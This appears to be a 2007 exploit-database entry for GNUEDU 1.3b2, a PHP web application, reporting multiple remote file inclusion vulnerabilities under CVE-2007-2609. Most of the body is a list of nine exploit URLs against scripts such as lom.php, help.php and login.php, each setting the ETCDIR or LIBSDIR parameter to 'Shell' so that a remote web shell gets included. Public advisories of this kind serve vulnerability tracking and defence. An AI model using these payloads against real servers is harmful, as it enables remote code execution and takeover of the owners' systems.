GNUEDU 1.3b2 - Multiple Remote File Inclusions
Author: GoLd_M
type: webapps
platform: php
port:
date_added: 2007-05-07
date_updated:
verified: 1
codes: OSVDB-38256;CVE-2007-2609;OSVDB-38255;OSVDB-38254;OSVDB-38253;OSVDB-38252;OSVDB-38251;OSVDB-38250;OSVDB-38249;OSVDB-38248
tags:
aliases:
screenshot_url:
application_url:
# gnuedu 1.3b2 Multiple Remote File Inclusion Vulnerabilities
# D.Script: http://gnuedu.ofset.org/download/
# Discovered by: GolD_M = [Mahmood_ali]
# Homepage: http://www.Tryag.Com/cc
# Exploit:[Path]/libs/lom.php?ETCDIR=Shell
# Exploit:[Path]/scripts/lom_update.php?ETCDIR=Shell
# Exploit:[Path]/scripts/check-lom.php?ETCDIR=Shell
# Exploit:[Path]/scripts/weigh_keywords.php?ETCDIR=Shell
# Exploit:[Path]/web/logout.php?LIBSDIR=Shell
# Exploit:[Path]/web/help.php?LIBSDIR=Shell
# Exploit:[Path]/web/index.php?LIBSDIR=Shell
# Exploit:[Path]/web/login.php?LIBSDIR=Shell
# Exploit:[Path]/web/lom.php?ETCDIR=Shell
# Greetz To: Tryag-Team ....**
# milw0rm.com [2007-05-08]